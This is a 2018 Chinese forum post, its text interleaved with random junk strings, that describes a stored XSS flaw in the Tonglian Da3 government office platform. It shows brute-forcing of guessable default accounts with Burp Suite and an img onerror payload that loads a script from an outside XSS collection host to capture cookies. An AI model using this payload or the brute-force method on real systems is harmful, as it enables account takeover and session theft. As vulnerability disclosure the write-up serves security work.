2 [9 t" u9 N2 j 5 R- _3 u- |4 K+ `
同联Da3协同办公平台后台通用储存型xss漏洞
8 h0 H: s4 }- W
5 E( ` z7 v( j6 }
% h# Y! C/ T5 ], l5 E1 n
平台简介:
$ D; n* W8 ^- S& Y" t
2 W1 x$ s$ P U- M, t% m4 ^2 L, X: ~' |
5 ^, {4 m7 t+ Z& s7 ? 1 h2 v5 N9 t7 g" x2 ?
# X; H9 d z0 {6 B
2 f$ E4 Q$ X6 b; c 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
. m( P( Y' I, W8 A7 Y
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
$ a0 T" _0 N. q( h同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!! O/ _8 e# I( P6 _7 _& {, y4 ]& u$ h8 Q
) g s; m) g u* e) f8 b
, Z' V, G* ~ w) r& _& p / x- T1 S! L* B# k5 q
6 E0 P# H* p) u; T+ v : E. z% B$ J. k# {7 }8 l) J
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:! k0 Z8 r' ?6 }% q; U3 a8 ]
" F2 ~: A6 _0 S. ~$ m
# W" I) r6 b- O5 `! M: ]% Q
* x# A( B, g6 A, F7 {! S7 y
; m, [5 y- i' z n6 j6 A. M
0 b* U2 \/ H s+ n3 h http://1.1.1.1:7197/cap-aco/#(案例2-)6 ^( f0 l8 |2 n3 b: i, Y) a6 z
$ C. @" q& a1 l% p+ d7 e- w
# Y& \' }& ^0 X
http://www.XXOO.com (案例1-官网网站)
: ?8 O; E. ~2 @7 p
: _2 [5 K+ O$ k) T9 K9 _ " T3 p/ w9 n# D1 j( a2 p# c
漏洞详情:3 d s3 f" \1 ?1 K7 _
3 N: @1 g! D9 W4 @2 D( C) C 0 i" _6 ^9 P5 Q/ Z8 {+ G* A
案例一、$ Y+ {2 e$ ?! R# s3 w$ A
2 r6 I$ `. G2 c ~ . `# U7 b, T3 r1 f) r( b* }* J/ t
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试- i# u2 `- u9 Y# L3 C* I
1 b& F3 Q$ {( Z' E" n
0 X. p! G# {9 b
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:4 i! O! [- e* Z$ Q- ^. F
& M! ~9 T% S6 q9 M
1 y( D2 d/ N2 ~2 O4 j! ` i$ K, }
3 _9 ], G# [' c) Q3 R1 W1 G; m
2 I, l8 K$ P; S J; b) p 3 l3 P/ h& k9 B5 ?, I
: l! l. d+ b% X4 Y% W
- M! ~2 ?" R" ^( V9 K0 @% R/ a( U
$ S, k% \" {* G status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: % [$ n. r' x" ~ f
9 P7 V h/ }' Z) N
/ \7 I! _( @- ?. o8 |
& F. R" I9 V5 n9 l6 q3 J
* D9 |4 z) b4 u8 E
1 ?6 {& E# o6 P6 F, A. c2 P 
" p2 [2 E. l# P
! a Q) S0 W3 F, ^% _- \2 L
, a+ [5 ]9 r: U! B6 g 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 8 N, }* M, n5 H
7 j4 U5 _# {: c1 M5 X9 c
: d: Z; W% D7 S- O& x
9 Q2 ~, z1 ^, i; L: S; Y
0 g/ W' j# u% N! g% m( _8 \
) C& ]4 z, }# v4 S* Q <img src=x
/ i8 H' i& v! f2 n9 @6 donerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: % \6 ^+ Q9 K* W1 E$ `% c( H# z
, z4 g& R7 s$ c5 i# |& r( W. l # I& [3 b7 | V* h3 M
' ?' v4 l+ |2 s9 r4 N2 p
3 T: x+ h' ?4 _: U5 ~' c
( }* l+ R, t9 C$ ~& a* f8 n 然后发送,接收cookie如图: - q) f, z: p( ^8 K
7 D, f! j& N- P; N% ]# \4 ~( D
1 X+ k9 r* r0 t2 a2 t
$ w1 i" {# @3 N
2 m- B3 q4 N( g" a/ R
8 i$ P: E) i; h7 L) D
& Z: N: N1 P# @& B4 m1 m- M
( \& ~$ H- s# u6 n' |# _7 G& z
2 J z, ]5 L# j : v! I j; C0 O" ^. l1 _
- m9 D1 \1 j9 z" H1 B9 V
- u+ E- E) ^5 N3 Y
- A# u, c2 @' @9 V) M0 x
" q d6 z9 q) l% ~7 q7 s* b4 u
1 `8 o& W) Q/ o, E( T 
+ H7 b. J1 p& g3 ^9 i% i1 n
t: f/ g- ?. s9 c
7 h5 v1 p* C4 A! z8 Z 
- ], z; k) Y8 n$ _1 W
, t( V# G. M; }2 {( Z$ [/ }
8 }) t% P5 \2 ?. x: _& _; d
1 \: [3 u, ^! W9 O
4 }3 q; o, m" T/ C& k8 r) }3 l7 d
# T5 k: x0 k7 h5 e; n3 K
案例2、 8 e4 [2 F. _' d
/ F8 S( S o% R( U4 K) R4 K
$ @* X' n, |7 ]4 I. ^) c# y 前面步骤都一样,下面看效果图:
0 D G. g' T6 Z, O+ q0 J8 C$ N
P& L& t+ _$ J7 W
3 R+ Q( P5 V( f 
' O3 U% E" e1 X
' `$ _' ^; G2 X$ s+ y( b) E
/ P. J( f/ @3 O, k
H6 c. R% f% d) C2 ?% f
# ?4 W8 s2 W: m. Y
( o8 r! D4 U n% p+ T' b
. P9 Q' i: O0 V {
# A0 d. E ~/ X# } ! \. F8 S3 b Z# Q! o
! h" w+ J0 c- L5 ~& X8 P
" t5 V: S+ y, F7 |9 l, ^
! |, q5 v/ \' Y
; z! A! Z, {/ C, X' I5 q* ^
4 ]* a E3 F) b0 \% ^
; I1 t: K- M. \) n+ J4 {
2 Q, S: y" j6 S4 j) Q4 f8 x3 V& Z
]. m( r$ y1 c9 ?0 _' B' X
: N: k' p" H" Y' o" ~ / j8 f5 |% z9 K; D* p* U
) k) y# Y; F+ k, k4 L
* J7 [; Q( {, c) A. q
2 }/ q: U5 e( |9 j1 v3 Z& s
- G. Z) T: X) Q" _+ \
, L( U9 C# j# j) O, k % ?1 D: X, i# B2 K8 }
3 F( }" v. k, Q6 ~$ O# W 
发表于 2018-10-20 20:14:15
收藏
支持
反对